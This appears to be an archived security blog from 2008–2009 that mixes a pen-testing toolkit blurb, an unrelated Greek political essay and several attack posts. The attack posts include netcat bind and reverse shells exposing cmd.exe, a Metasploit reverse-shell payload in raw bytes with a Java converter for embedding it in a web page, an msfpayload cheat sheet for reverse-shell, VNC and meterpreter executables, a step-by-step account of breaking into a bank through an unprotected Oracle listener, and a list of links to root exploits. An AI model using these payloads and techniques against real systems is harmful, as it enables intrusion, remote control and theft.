IT Security Concept's

Samurai Web Testing Framework

kavasilo — Tue, 19 May 2009 08:54:50 +0000

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-tes
Samurai Download

Netcat Basics

kavasilo — Tue, 28 Apr 2009 12:38:42 +0000

Netcat is an essential tool for any pen tester or security consultant.

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

It provides access to the following main features:

* Outbound and inbound connections, TCP or UDP, to or from any ports.
* Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.
* Built-in port-scanning capabilities, with randomizer.
* Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of trasmitted and received data.
* Optional RFC854 telnet codes parser and responder.

open a terminal a type :

[root@itsecurity /]# nc -h
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-p port Specify local port for remote connects
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: “4″, “5″ (SOCKS) or “connect”
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
These are the command line options. I order to connect to a specific port just type:

[root@itsecurity /]# nc -vv host 80

[root@itsecurity /]# nc -vv host 80
Connection to host 80 port [tcp/http] succeeded!
OPTIONS / HTTP/1.0

HTTP/1.1 401 Unauthorized
Content-Length: 1656
Content-Type: text/html
Server: Microsoft-IIS/6.0
WWW-Authenticate: NTLM
Date: Tue, 28 Apr 2009 12:24:25 GMT
Connection: close

In order to listen to a specific port using netcat type:
[root@itsecurity /]# nc -lvvp 5555

if you want to bind/export your cmd.exe to a tcp port just type

[root@itsecurity /]#nc -lvvp 5555 -e cmd.exe

On the other hand if you want to send to somebody your cmd.exe you must type:

nc -v IP_Address 5555 -e cmd.exe

Thats it folks.

MS Internet Explorer XML Parsing Buffer Overflow Exploit

kavasilo — Fri, 19 Dec 2008 09:26:27 +0000

Following the new IE exploit i tried to modify the original payload and insert my own. So i change the payload from windows/exec/ to windos/shell_reverse_tcp. My problem was that metasploit does not generate the payload in javascript. After googling i found a wonderfull script to do the job for me.

=[ msf v3.2-release
+ -- --=[ 320 exploits - 217 payloads
+ -- --=[ 20 encoders - 6 nops
=[ 99 aux

msf > use windows/shell_reverse_tcp
msf payload(shell_reverse_tcp) > show options

Module options:

Name      Current Setting Required Description
----      --------------- -------- -----------
EXITFUNC seh              yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

msf payload(shell_reverse_tcp) > set LHOST 10.0.11.59
LHOST => 10.0.11.59

msf payload(shell_reverse_tcp) > set EXITFUNC process
EXITFUNC => process
msf payload(shell_reverse_tcp) > generate -e x86/shikata_ga_nai -t java
/*
* windows/shell_reverse_tcp - 314 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* EXITFUNC=process, LPORT=4444, LHOST=10.0.11.59
*/
byte shell[] = new byte[]
{
(byte) 0xda, (byte) 0xda, (byte) 0xd9, (byte) 0×74, (byte) 0×24, (byte) 0xf4, (byte) 0xba, (byte) 0x4b,
(byte) 0×49, (byte) 0xa2, (byte) 0xcc, (byte) 0x5b, (byte) 0x2b, (byte) 0xc9, (byte) 0xb1, (byte) 0×48,
(byte) 0×83, (byte) 0xeb, (byte) 0xfc, (byte) 0×31, (byte) 0×53, (byte) 0×16, (byte) 0×03, (byte) 0×53,
(byte) 0×16, (byte) 0xe2, (byte) 0xbe, (byte) 0xb5, (byte) 0xc8, (byte) 0×27, (byte) 0x0d, (byte) 0xae,
(byte) 0xf4, (byte) 0×47, (byte) 0×72, (byte) 0xd1, (byte) 0×67, (byte) 0×33, (byte) 0xe0, (byte) 0x0a,
(byte) 0x4c, (byte) 0xc8, (byte) 0xbd, (byte) 0x6e, (byte) 0×07, (byte) 0xb2, (byte) 0×38, (byte) 0xf7,
(byte) 0×16, (byte) 0xa4, (byte) 0xc9, (byte) 0×48, (byte) 0×01, (byte) 0xb1, (byte) 0×92, (byte) 0×76,
(byte) 0×30, (byte) 0x2e, (byte) 0×65, (byte) 0xfc, (byte) 0×06, (byte) 0x3b, (byte) 0×74, (byte) 0xec,
(byte) 0×56, (byte) 0xfb, (byte) 0xef, (byte) 0x5c, (byte) 0x1c, (byte) 0x3b, (byte) 0x7b, (byte) 0x9a,
(byte) 0xdc, (byte) 0×76, (byte) 0x8e, (byte) 0xa5, (byte) 0x1c, (byte) 0x6d, (byte) 0×64, (byte) 0x9e,
(byte) 0xf4, (byte) 0×56, (byte) 0xac, (byte) 0×94, (byte) 0×11, (byte) 0x1d, (byte) 0xf3, (byte) 0×72,
(byte) 0xdb, (byte) 0xc9, (byte) 0x6d, (byte) 0xf0, (byte) 0xd7, (byte) 0×46, (byte) 0xfa, (byte) 0×59,
(byte) 0xf4, (byte) 0×59, (byte) 0×17, (byte) 0×66, (byte) 0×28, (byte) 0xd1, (byte) 0x6e, (byte) 0×05,
(byte) 0×14, (byte) 0xf9, (byte) 0×11, (byte) 0×15, (byte) 0×65, (byte) 0xda, (byte) 0xb5, (byte) 0×12,
(byte) 0xc5, (byte) 0xec, (byte) 0xbe, (byte) 0×65, (byte) 0xc6, (byte) 0×87, (byte) 0xb0, (byte) 0×79,
(byte) 0x7b, (byte) 0x1c, (byte) 0×70, (byte) 0x8a, (byte) 0xdd, (byte) 0x4b, (byte) 0xfe, (byte) 0xc4,
(byte) 0xef, (byte) 0×67, (byte) 0xae, (byte) 0×27, (byte) 0×39, (byte) 0×11, (byte) 0x1d, (byte) 0xbe,
(byte) 0xae, (byte) 0xed, (byte) 0×93, (byte) 0×56, (byte) 0×58, (byte) 0×61, (byte) 0xe1, (byte) 0xf9,
(byte) 0xf2, (byte) 0x7a, (byte) 0xd5, (byte) 0x6e, (byte) 0×30, (byte) 0×69, (byte) 0×29, (byte) 0×55,
(byte) 0×96, (byte) 0x8d, (byte) 0×07, (byte) 0xf5, (byte) 0x9f, (byte) 0×97, (byte) 0xc1, (byte) 0x8b,
(byte) 0x4d, (byte) 0x5f, (byte) 0x0f, (byte) 0xd9, (byte) 0xe7, (byte) 0×62, (byte) 0xf0, (byte) 0×31,
(byte) 0x9f, (byte) 0xbb, (byte) 0×07, (byte) 0×47, (byte) 0xcd, (byte) 0x6b, (byte) 0xe8, (byte) 0×71,
(byte) 0x5d, (byte) 0xc7, (byte) 0×45, (byte) 0x2d, (byte) 0×21, (byte) 0xb4, (byte) 0x2a, (byte) 0×82,
(byte) 0x5a, (byte) 0xea, (byte) 0xc4, (byte) 0x2e, (byte) 0xa5, (byte) 0×00, (byte) 0x2f, (byte) 0×49,
(byte) 0xcd, (byte) 0×07, (byte) 0×13, (byte) 0xf3, (byte) 0x5e, (byte) 0xa1, (byte) 0x4a, (byte) 0x6e,
(byte) 0×08, (byte) 0x5d, (byte) 0×75, (byte) 0x3b, (byte) 0xa9, (byte) 0xca, (byte) 0x7a, (byte) 0xea,
(byte) 0×40, (byte) 0xe5, (byte) 0xd5, (byte) 0×46, (byte) 0x6a, (byte) 0xd5, (byte) 0xb3, (byte) 0×02,
(byte) 0xf0, (byte) 0xb0, (byte) 0×53, (byte) 0xb0, (byte) 0×95, (byte) 0×56, (byte) 0xf3, (byte) 0x6f,
(byte) 0x4f, (byte) 0x6b, (byte) 0x7a, (byte) 0×68, (byte) 0xe5, (byte) 0×37, (byte) 0xf5, (byte) 0×95,
(byte) 0xcb, (byte) 0×77, (byte) 0xf6, (byte) 0xf0, (byte) 0xb9, (byte) 0xf1, (byte) 0×05, (byte) 0xfa,
(byte) 0×80, (byte) 0x2c, (byte) 0x0b, (byte) 0×41, (byte) 0×29, (byte) 0xa2, (byte) 0×89, (byte) 0x7e,
(byte) 0x9a, (byte) 0×17, (byte) 0xc6, (byte) 0×17, (byte) 0xae, (byte) 0×99, (byte) 0xab, (byte) 0xfe,
(byte) 0xb1, (byte) 0×13, (byte) 0xe3, (byte) 0×01, (byte) 0x9b, (byte) 0×87, (byte) 0xa4, (byte) 0xaf,
(byte) 0×75, (byte) 0×69, (byte) 0x1b, (byte) 0x3a, (byte) 0×77, (byte) 0xd8, (byte) 0xca, (byte) 0xef,
(byte) 0×26, (byte) 0×25, (byte) 0x3c, (byte) 0×67, (byte) 0×64, (byte) 0×00, (byte) 0xb9, (byte) 0xb6,
(byte) 0×25, (byte) 0x4c, (byte) 0×17, (byte) 0x2c, (byte) 0×35, (byte) 0x4d, (byte) 0xa0, (byte) 0x4e,
(byte) 0×19, (byte) 0xda, (byte) 0×29, (byte) 0xc9, (byte) 0x5c, (byte) 0×62, (byte) 0x4a, (byte) 0x5f,
(byte) 0×65, (byte) 0x6a, (byte) 0×62, (byte) 0x5f, (byte) 0×12, (byte) 0×68, (byte) 0×75, (byte) 0×70,
(byte) 0xb5, (byte) 0xee, (byte) 0×51, (byte) 0×93, (byte) 0×35, (byte) 0x5c, (byte) 0x9e, (byte) 0×82,
(byte) 0×45, (byte) 0xb2
};

So now Use the following java code (toJS) to change your paylaod to javascript:

public class toJS {

 static int LENGTH=870;

 static byte shell[] = new byte[]

                         {

                                // your shell code goes here 

                         };

 public static void main(String[] args) {

  String shell2 = "";

  for (int i=0; i< LENGTH; i=i+2)

  {

   int b1 =((byte) shell[i+1] <<  & 0x0000ff00;

   b1 =  b1 | ((byte) shell[i] & 0x000000ff);

   String word  = Integer.toHexString(b1);

   if(word.length()==0)

     word = "0000";

   else if (word.length() ==1)

     word = "000" + word;

   else if( word.length() ==2 )

    word = "00" + word;

   else if( word.length() ==3 )

    word = "0" + word;

   shell2 += "%u" + word;

  }

  System.out.println(shell2);

 }

}

The only change you have to do is in this line. Our payload is 314 bytes.

static int LENGTH=870;

So now just type ( I assume you allready have jdk installed) :

javac toJS.java

java toJS

Your javascript payload is ready. Copy it and paste it to the html file.

If you are looking for the patch here is the link

www.microsoft.com/technet/security/bulletin/ms08-078.mspx

- msfpayloads -

kavasilo — Thu, 18 Dec 2008 09:42:08 +0000

1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > open_shell_on_port.exe

So use netcat to connect to the victim:
nc xxx.xxx.xxx.xxx 4444

2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx X > reverse-shell.exe

So now wait for a shell:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=xxx.xxx.xxx.xxx E

3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=4444 X > listen-vnc.exe

Run this command to connect to the target system:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=4444 RHOST=xxx.xxx.xxx.xxx DisableCourtesyShell=TRUE E

4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 X > /tmp/reverse-vnc.exe

Run this command and wait for the remote system to connect to you:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 DisableCourtesyShell=TRUE E

5. For a meterpreter listener

create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > metepreter_bind.exe

To connect to the victim run :
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=xxx.xxx.xxx.xxx LPORT=4444 E

Η ελληνική «νύχτα των κρυστάλλων»

kavasilo — Mon, 15 Dec 2008 10:02:30 +0000

Η ελληνική «νύχτα των κρυστάλλων»

Του Brady Kiesling*

Στις 6 Δεκεμβρίου, ένας Ελληνας αστυνομικός παραβίασε τους σαφείς διατυπωμένους κανόνες εμπλοκής της υπηρεσίας του και χρησιμοποίησε παρανόμως το όπλο του. Ηταν τόσο άτυχος, ώστε να σκοτώσει ένα μικρό παιδί. Οι καταστροφές που ακολούθησαν δεν είχαν όμως καμιά σχέση με την τύχη. Δεκάδες Ελληνες δημοσιογράφοι έσπευσαν να βάψουν τα χέρια τους με το αίμα του Αλέξη. Χωρίς να περιμένουν την αυτοψία, τα αποτελέσματα της βαλλιστικής εξέτασης ή το πόρισμα των ανακριτικών αρχών, αποφάνθηκαν ότι η αστυνομία «δολοφόνησε εν ψυχρώ το νεαρό». Προσέθεσαν δε ότι ο θάνατος του Αλέξη ακολουθεί τη λογική παρόμοιων περιπτώσεων στο παρελθόν και ενισχύει τον ισχυρισμό ότι η ελληνική αστυνομία είναι εκτός ελέγχου. Η δέουσα αντίδραση της κοινωνίας απεικονίστηκε από τον ταλαντούχο σκιτσογράφο της «Καθημερινής», Ηλία Μακρή, ο οποίος στις 9 Δεκεμβρίου ζωγράφισε μια πένα να διαπερνά τρεις αστυνομικούς με την επισήμανση «συγγνώμη, εξοστρακίστηκε».

Καθώς περπατούσα στη Φιλελλήνων και έβλεπα τους εμπόρους να μαζεύουν τις σπασμένες βιτρίνες των καταστημάτων τους, μου ήλθε στο μυαλό η «Kristallnacht», η «Νύχτα των Κρυστάλλων». Ας μην λησμονούμε άλλωστε ότι οι βανδαλισμοί των καταστημάτων των Εβραίων από τους Ναζί, το 1938, ξεκίνησαν από τη δολοφονία ενός Γερμανού διπλωμάτη στο Παρίσι από έναν Εβραίο θερμοκέφαλο. Το ιδεολόγημα της συλλογικής ενοχής, το οποίο έχει εγκαταλειφθεί εδώ και χρόνια από κάθε πολιτισμένο λαό, ζει και βασιλεύει στον κόσμο της ελληνικής δημοσιογραφίας. Οι αστυνομικοί είναι φονιάδες. Γι’ αυτό πρέπει να τους λούσουμε με βενζίνη και φωτιά. Για να τους φέρουμε σε απόσταση βολής, δεν πρέπει να διστάσουμε να σπάσουμε καταστήματα ή να προβούμε σε εμπρησμούς.

Αναμφίβολα, οι Ελληνες δημοσιογράφοι θα προσβληθούν από την εν λόγω σύγκριση. Αλλωστε, το πογκρόμ των τελευταίων ημερών δεν στράφηκε εναντίον Εβραίων ή Αθίγγανων, αλλά εναντίον των τρισκατάρατων αστυνομικών. Για να μην τους προκαλέσω περισσότερο λοιπόν, τους καλώ να διαβάσουν την προκήρυξη της 17 Νοέμβρη μετά το θάνατο του 15χρονου Μιχάλη Καλτεζά από τον αστυνομικό Μελίστα. Η γλώσσα που χρησιμοποιούν σήμερα τα μεγάλα μέσα ενημέρωσης ελάχιστα διαφέρει από εκείνη που χρησιμοποιούσε τότε η τρομοκρατική οργάνωση. Η διαφορά βεβαίως είναι ότι οι Ελληνες δημοσιογράφοι δεν χρειάζεται να παγιδεύσουν το αμάξι ενός αστυνομικού με εκρηκτικά, για να κατακτήσουν το δικαίωμα να παροτρύνουν άλλους να το κάνουν.

Η Νύχτα των Κρυστάλλων, ήταν ένας εκτραχηλισμός που απλώς περίμενε την κατάλληλη στιγμή για να ξεσπάσει. Το ίδιο συνέβη και στη σημερινή Αθήνα. Οταν όσοι έχουν κύρος στην ελληνική κοινωνία – δάσκαλοι, πολιτικοί και δημοσιογράφοι – καθιστούν σαφές στους νέους ότι η καταστροφική τους μανία αποτελεί ένδειξη πολιτικής αρετής και δεν θα τύχει οιασδήποτε τιμωρίας, μία μικρή μεν, ικανή δε, ομάδα εξ αυτών θα εκμεταλλευθεί την ελευθερία κινήσεων που της παρέχεται. Για όσους δεν ζουν μόνιμα στην Ελλάδα, η άποψη ότι η Ελληνική Αστυνομία αποτελείται από αυταρχικούς φονιάδες φαντάζει τουλάχιστον βλακώδης. Εκπληκτοι οι τουρίστες παρακολουθούν τους Ελληνες οδηγούς να παραβιάζουν κάθε κανόνα οδικής κυκλοφορίας και ασφάλειας και να παραμένουν ατιμώρητοι. Σε άλλες χώρες, θεωρείται κοινός τόπος ότι ο σεβασμός στους νόμους σώζει πολύ περισσότερες ζωές από όσες καταστρέφει. Στην Ελλάδα όμως, τα ελληνικά σχολεία θρηνούν εκατοντάδες συμμαθητές του Αλέξη κάθε χρόνο, λόγω της ανοχής της κοινωνίας στη δολοφονική συμπεριφορά των οδηγών, στη διαφθορά των επιθεωρητών εργασίας και στην απόρριψη των τοξικών αποβλήτων των εργοστασίων στα ποτάμια.

Ο ανεπαρκής εξοπλισμός και εκπαίδευση και το πεσμένο ηθικό της ελληνικής αστυνομίας είναι συμπτώματα και όχι αιτίες της κατάρρευσης του κράτους δικαίου. Κάθε μήνα, το ελληνικό κοινοβούλιο ψηφίζει και έναν καινούργιο κακογραμμένο νόμο για να κατευνάσει την οργή της κοινής γνώμης για κάποια περίπτωση κατάχρησης εξουσίας. Οι Ελληνες, από την πλευρά τους, χειροκροτούν την ψήφιση αυτών των νόμων, αλλά αντιτίθενται στην εφαρμογή τους. Το ίδιο και οι πολιτικοί. Οι ανεφάρμοστοι νόμοι και οι εξευτελιστικοί μισθοί εγγυώνται την άνθηση της διαφθοράς στην ελληνική αστυνομία. Η διαφθορά οδηγεί μαθηματικά στην καταρράκωση του κύρους της. Η έλλειψη κύρους και σεβασμού για τα σώματα ασφαλείας αποτελούν μία πολύ βολική λογική εξήγηση για την ανομία σε όλα τα επίπεδα της ελληνικής κοινωνίας.

Πράγματι, υπάρχουν θερμόαιμοι στους κόλπους της αστυνομίας, οι οποίοι ενίοτε υιοθετούν βίαιες συμπεριφορές απέναντι σε όσους μετανάστες πέφτουν στα χέρια τους. Αλλά οι νταήδες αυτοί είναι ταυτόχρονα και δειλοί, ενώ η δημογραφική ομάδα των ανυπεράσπιστων τους οποίους μπορούν να βασανίσουν ατιμώρητα είναι μικρή και συρρικνώνεται συνεχώς. Οι αστυνομικοί που παραβιάζουν τον όρκο τους διακινδυνεύουν την ίδια βραδυκίνητη και επιφυλακτική απονομή δικαιοσύνης που περιμένει κάθε Ελληνα που παρανομεί.

Ο σεβασμός του κράτους δικαίου απαιτεί ο θάνατος του Αλέξη να τύχει παραδειγματικής και ταχείας τιμωρίας. Οι δικαστές και οι ένορκοι, έχοντας κατά νου όλα τα στοιχεία της υπόθεσης, οφείλουν να ζυγίσουν από τη μία πλευρά το δικαίωμα της αυτοάμυνας κάθε ανθρώπινου όντος –συμπεριλαμβανομένων και των αστυνομικών– και από την άλλη την υποχρέωση των οργάνων της πολιτείας να προστατεύουν την ανθρώπινη ζωή ακόμη και με κίνδυνο της δικής τους. Η ελληνική κοινωνία θα γίνει υγιέστερη μόνο αν τιμωρηθεί το ίδιο το έγκλημα και όχι αυτό που τα ΜΜΕ αντιλαμβάνονται ως έγκλημα.

Κάθε Νύχτα των Κρυστάλλων αποτελεί πλήγμα για τον αυτοσεβασμό ενός έθνους. Αφού διασκεδάσαμε ολόκληρο τον κόσμο με την ανικανότητα της ελληνικής αστυνομίας να υπερασπίσει την Αθήνα ενάντια σε μερικές εκατοντάδες ταραξίες, τώρα μερικοί υπεύθυνοι δημοσιογράφοι αλλάζουν γραμμή προκειμένου να συντονιστούν με τον προβληματισμό της κοινής γνώμης. Ισως τα γεγονότα της περασμένης εβδομάδας να εντάσσονται σε μία ευρύτερη διαδικασία ωρίμασης. Οι δημοσιογράφοι είναι τα χαϊδεμένα παιδιά της ελληνικής κοινωνίας. Ας τους αφήσουμε να δικαιολογήσουν τις ναρκισσιστικές επαναστατικές τους ασκήσεις, παίζοντας το ρόλο της νομιμοποιημένης εκδοχής της 17 Νοέμβρη, αντί να υπερασπιστούν με σθένος, ως οφείλουν, το κράτος δικαίου σε μία στιγμή που το κράτος αποτυγχάνει, όπως τώρα, να προστατεύσει τους πολίτες του.

* O κ. Brady Kiesling είναι πρώην διπλωμάτης των ΗΠΑ. Παραιτήθηκε σε ένδειξη διαμαρτυρίας για την εισβολή των ΗΠΑ στο Ιράκ κι έκτοτε ζει μόνιμα στη χώρα μας.

Attack port 1521 Oracle

kavasilo — Thu, 27 Nov 2008 11:43:59 +0000

You can find the same post at www.p0wnbox.com ( Its a wonderfull site from greek geeks focus on IT Security, So i posted this article there too)

Many large organizations are using Oracle DB. As a pen tester i always found port 1521 open and the remote Oracle tnslsnr has no password assigned. The pen tester may use this fact to shut it down arbitrarily, thus preventing legitimate users from using it properly. You should use the lsnrctrl SET PASSWORD command to assign a password to the tnslsnr.

The following shows the individual stages of the successful attack against some European bank. The whole internal LAN was compromised through that server and specific through port 1521.

$ tnscmd.pl status –h xxx.xxx.xxx.xxx

connect writing 89 bytes [(CONNECT_DATA=(COMMAND=status))]

.Y…….6.,……………:…………….4………….(CONNECT_DATA=(C

OMMAND=status))

read

………6………}………………….

(DESCRIPTION=(TMP=)

(VSNNUM=135290880)

(ERR=0)

(ALIAS=LISTENER)

(SECURITY=OFF)

(VERSION=TNSLSNR.for.IBM/AIX.RISC.System/6000:.Version.8.1.6.0.0.-

.Production)

(START_DATE=xxxxxxxxxx)

(SIDNUM=1)

(LOGFILE=/home/oracle/app/oracle/product/8.1.6/network/log/listener.log)

(PRMFILE=/home/oracle/app/oracle/product/8.1.6/network/admin/listener.ora)

(TRACING=off)

(UPTIME=37107630)

(SNMP=ON))……….(ENDPOINT=(HANDLER=(STA=ready)

(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)

(HANDLER_ID=E858D3D8EB6C-6832-E033-

C22A01016832)(PRE=ttc)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOS

T=DOMAIN_NAME)(PORT=1521))))),,

(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLIS

HED=0)(REFUSED=0)(HANDLER_ID=E858D3D8EB6D-6832-E033-

C22A01016832)(PRE=ttc)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY

=EXTPROC))))),,

(SERVICE=(SERVICE_NAME=PLSExtProc)(INSTANCE=(INSTANCE_NAME=PLSExtProc)(NUM

=1)(INSTANCE_CLASS=ORACLE)(NUMREL=1))),,

(SERVICE=(SERVICE_NAME=oracc)(INSTANCE=(INSTANCE_NAME=oracc)(NUM=1)(INSTAN

CE_CLASS=ORACLE)(NUMREL=1))(INSTANCE=(INSTANCE_NAME=oracc)(NUM=2)(INSTANCE

_CLASS=ORACLE)(NUMREL=2))),,………@

eon

Testing the status with tnscmd: The security level is not set. So, no passwords are needed
for set commands. I tried to set the log file to /home/oracle/.rhosts

$ tnscmd.pl –h xxx.xxx.xxx.xxx –rawcmd “

(DESCRIPTION= (CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))

(COMMAND=log_file)(ARGUMENTS=4) (SERVICE=LISTENER) (VERSION=1)

(VALUE=/home/oracle/.rhosts)))”

sending…

(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file

)(ARGUMENTS=4)(SERVICE=LISTENER)

(VERSION=1)(VALUE=/home/oracle/.rhosts)))

It was possible to set a new path (/home/oracle/.rhosts) for the log file. Now lets try to
connect to the Oracle database to generate an entry with my IP address in the new log
file (this is now the .rhosts).

$ tnscmd.pl -h VICTIM_IP–rawcmd “(CONNECT_DATA=((

Attacker_IP oracle

“

writing 93 bytes

sending (CONNECT_DATA=((

to VICTIM_IP:1521

.$…..”..(DESCRIPTION=(ERR=1153)

(ERROR_STACK=(ERROR=i(CODE=1153)(EMFI=4)

(ARGS=’(CONNECT_DATA=((. Attacker_IP oracle’))

(ERROR=(CODE=303)(EMFI=1))))

Now it should be possible to login to the server because i edit the .rhosts file and add the following
line: “MY_IP oracle”

$ rlogin xxx.xxx.xxx.xxx -l oracle

************************************************************************

BANK OF XXXXXXXXXX *

* ACCESS FOR AUTHORISED USERS ONLY

* http://www.xxxxxxxxxxx.com

***********************************************************************

Last unsuccessful login: Wed 10 Nov 2008 15:45:57 on ssh from xxx.xxx.xxx.xxx

Last login: Fri 12 Nov 2008 15:24:57 on /dev/pts/9 from xxx.xxx.xxx.xxx

[YOU HAVE NEW MAIL]

Root exploits and working links.

kavasilo — Thu, 27 Nov 2008 09:46:25 +0000

Recently i found a list with some “root” remote and local exploits with the related link to the actual exploit code. If you know that some exploits are missing contact me to add it.

Linux
Common
Linux 2.2.x ->Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3)
Linux 2.2.x (on exported files, should be vuln) (http://milw0rm.com/exploits/718)
Linux <= 2.2.25 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)

Linux 2.4.x ->Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3)
Linux 2.4.x -> pwned.c – Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895)
Linux 2.4.x ->Linux kernel 2.4 uselib() privilege elevation exploit (http://milw0rm.com/exploits/778)
Linux 2.4.20 ->Linux Kernel Module Loader Local R00t Exploit (http://milw0rm.com/exploits/12)
Linux <= 2.4.22 ->Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (http://milw0rm.com/exploits/131)
Linux 2.4.22 ->Linux Kernel 2.4.22 “do_brk()” local Root Exploit (PoC) (http://milw0rm.com/exploits/129)

Linux <= 2.4.24 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)
Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) (http://milw0rm.com/exploits/718)

Linux <= 2.6.2 ->Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)
Linux 2.6.11 -> Linux Kernel <= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (http://milw0rm.com/exploits/1397)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate) (http://milw0rm.com/exploits/2031)
Linux 2.6.13 <= 2.6.17.4 -> Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (http://milw0rm.com/exploits/2011)
Linux 2.6.11 <= 2.6.17.4 -> h00lyshit.c -Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit (http://milw0rm.com/exploits/2013)
Linux 2.6.x < 2.6.7-rc3 (default configuration) (http://milw0rm.com/exploits/718)
Linux 2.6.x -> pwned.c – Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895)

Debian
Debian 2.2 ->/usr/bin/pileup Local Root Exploit (http://milw0rm.com/exploits/1170)

Ubuntu
Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (http://milw0rm.com/exploits/1579)

Slackware
Slackware 7.1 ->/usr/bin/Mail Exploit (http://milw0rm.com/exploits/285)

Mandrake
Mandrake 8.2 -> /usr/mail local exploit (http://milw0rm.com/exploits/40)
Mandrake <= 10.2 -> cdrdao Local Root Exploit (http://milw0rm.com/exploits/997)

Suse
SuSE Linux 9.1 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
SuSE Linux 9.2 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
SuSE Linux 9.3 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
SuSE Linux 10.0 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
SuSE Linux Enterprise Server 8 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)
SuSE Linux Enterprise Server 9 -> ‘chfn’ local root bug (http://milw0rm.com/exploits/1299)

BSD
Freebsd
Freebsd 3.5.1 ->Ports package local root (http://milw0rm.com/exploits/286)
Freebsd 4.2 ->Ports package local root (http://milw0rm.com/exploits/286)
FreeBSD 4.x <= 5.4) master.passwd Disclosure Exploit (http://milw0rm.com/exploits/1311)

Openbsd

Openbsd 2.x – 3.3 ->exec_ibcs2_coff_prep_zmagic() Kernel Exploit (http://milw0rm.com/exploits/125)
OpenBSD 3.x-4.0 ->vga_ioctl() root exploit (http://milw0rm.com/exploits/3094)

Sun-Microsystems Solaris
Solaris 2.4 ->lion24.c (http://milw0rm.com/exploits/328)

Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182)
Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182)
Solaris 5.5.1 ->X11R6.3 xterm (http://milw0rm.com/exploits/338)
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182)
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182)
Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/714)
Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/713)
Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/713)
Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/714)
